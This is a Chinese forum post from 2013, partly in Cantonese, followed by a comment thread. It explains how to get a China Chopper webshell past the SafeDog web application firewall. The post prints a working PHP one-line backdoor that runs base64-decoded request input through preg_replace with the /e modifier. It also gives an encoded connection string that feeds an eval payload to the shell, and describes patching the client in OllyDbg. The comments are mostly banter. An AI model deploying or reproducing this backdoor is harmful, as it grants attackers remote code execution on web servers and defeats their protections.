by 骚总,落叶纷飞

琴日骚总带领落叶哥哥一起日一站,忽遇一狗,后面跟小骚猪一起砍死了小狗,没技术含量,本来想让骚猪发到乌云上混个ID算,谁知那只猪仔喜欢潜水不要ID,不喜欢冒泡,落叶哥哥就直接发ZONE分享下算了

传左shell上去但系被狗拦左,shell过狗仲系好容易噶,但系过左狗之后狗狗仲系拦菜刀提交的数据包

然后骚总想到了个方法,就系在一句话解密传递的数据

菜刀连接PHP一句话时会自己重新定义一个z0变量来执行PHP代码,我们只要用OD把EVAL POST去掉就得咯,一句话马的密码随便填,不就能过狗狗了吗

一句话:

<?php preg_replace("/^/e",base64_decode($_REQUEST[g]),0);?>

菜刀连接,密码随便填

http://192.168.100.193/s.php?g=ZXZhbChiYXNlNjRfZGVjb2RlKCRfUkVRVUVTVFt6MF0pKQ==

普通刀

乱刀砍狗,让小狗跪舔菜刀 - 菜刀过安全狗方法

打狗刀

乱刀砍狗,让小狗跪舔菜刀 - 菜刀过安全狗方法

总结:如果在服务端解密,客户端只传加密信息过去的话,狗永远都是打不过刀

[原文地址]

相关内容:

对于脚本木马的免杀(特别针对安全狗的V3.0)的经验副过狗菜刀

简单绕过安全狗进行任何操作 让狗形同虚设

网爆安全狗存在远程溢出漏洞

实战这些年咬过我们的安全狗(总结篇)

看哥是怎么突破安全狗和360网站卫士的

破那个垃圾安全狗技术总汇

安全狗 iis 6.0 ; 截断解析突破

视频: 史诗级别的狗大战猫 【喵汪片】史诗级别的狗猫大战

相关讨论:

1#

落叶纷飞 (im luoye,Once the 00day) | 2013-07-02 13:11

第一次用OD,连另存文件都不会,搞左半个钟先知道点另存文件,仲要比大牛牛鄙视了一下

2#

Coody (&_&) | 2013-07-02 13:16

求DZ的打狗刀。。。。表示OD不太会用。。。。。

3#

落叶纷飞 (im luoye,Once the 00day) | 2013-07-02 13:23

@Coody 叼猪啦,落叶哥哥都用得好痛苦,OD噶用户体验真系太差了,负分啊

4#

Coody (&_&) | 2013-07-02 13:35

@落叶纷飞 ...

5#

乌云 (㊣) | 2013-07-02 13:43

看来普通话真的有必要普及。

6#

梧桐雨 (一个习惯逛zone社区的路人) | 2013-07-02 13:47

@乌云 楼主说的是粤语,看来你看不懂哈

7#

Sunshine (此处内容为隐藏0day,点击右边感谢即可查看此0day) | 2013-07-02 13:55

@乌云 +1,深表看不懂。。

8#

落叶纷飞 (im luoye,Once the 00day) | 2013-07-02 14:03

@乌云 粤语系我低广东猪噶母语啊,叼猪

9#

F4K3R | 2013-07-02 14:04

表示不标准粤语~ - =!

10#

专业查水表 (我是"J.L"的代言人o(`ω′ )o) | 2013-07-02 14:09

@Sunshine @乌云 点击右侧感谢即可获得本文翻译~~~

11#

乌云 (㊣) | 2013-07-02 15:09

@落叶纷飞 蛮夷。

12#

Sunshine (此处内容为隐藏0day,点击右边感谢即可查看此0day) | 2013-07-02 15:46

@专业查水表 已感谢。

13#

乌帽子 (儿啊,到大城市切莫乱搞女人啊,染上什么病回来传染给) | 2013-07-02 18:02

粤语我会啊~~~ 叼你老母

14#

落叶纷飞 (im luoye,Once the 00day) | 2013-07-02 18:05

@乌帽子 收皮啦

15#

乌帽子 (儿啊,到大城市切莫乱搞女人啊,染上什么病回来传染给) | 2013-07-02 18:10

@落叶纷飞 囧。。低调,其实我也不喜欢普通话

16#

专业查水表 (我是"J.L"的代言人o(`ω′ )o) | 2013-07-02 22:11

@Sunshine 骗子囧

17#

雅柏菲卡 (万物有灵,切忌污损。。。。。。) | 2013-07-02 22:19

别砍 给我做宠物

18#

好人 (签名好短啊,限制了。。。。,。。。。。。。。。。。) | 2013-07-02 22:52

...一句话得看半天。

19#

云中鹰 (suck me?) | 2013-07-02 22:59

赞一个木JJ~

20#

erevus (有人说签名要长才有人看。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。) | 2013-07-02 23:24

更卵叼?

留言评论(旧系统):

核爆炸 @ 2013-07-03 13:40:48

我都唔知讲咩好嘢,丢。。。 点解唔俾个下载吖, 安全狗丢你老木个嗨,防来防去,仲唔系防嘅我哋菜鸟添? 丢。。。。

本站回复:

一句都没看懂……

佚名 @ 2013-07-04 16:04:38

我是说 我都不知道说什么好, 我去。 为什么不给个下载呢。 安全狗草泥马的,防来防去,还不是只能防住我等菜鸟吗?日。。。

本站回复:

菜鸟占大多数,对于普通站点来说,防住这个群体已经算解决大问题了…… ╮(╯_╰)╭

核爆炸 @ 2013-07-05 13:06:39

哈哈,我又来啦。这次不讲广东话,问个问题。为什么在嗅探的时候,Cain可以扫到网卡,但是却嗅不到任何数据呢。。。

本站回复:

此问题原因很多(废话,如果你他么的网卡都识别不到,你他么的咋连上去的!)……

Nandi @ 2013-07-05 13:36:53

核总给你发了封邮件。

本站回复:

何事……

核爆炸 @ 2013-07-05 19:05:53

我说的是可以扫到其他机器的MAC地址。。。

本站回复:

那是必须的,扫不到你还嗅探个毛……

过狗 @ 2015-01-03 18:11:42

床前明月光下一句是? 地上鞋两双 。横批:求杀狗菜刀一把。

本站回复:

-_-!!!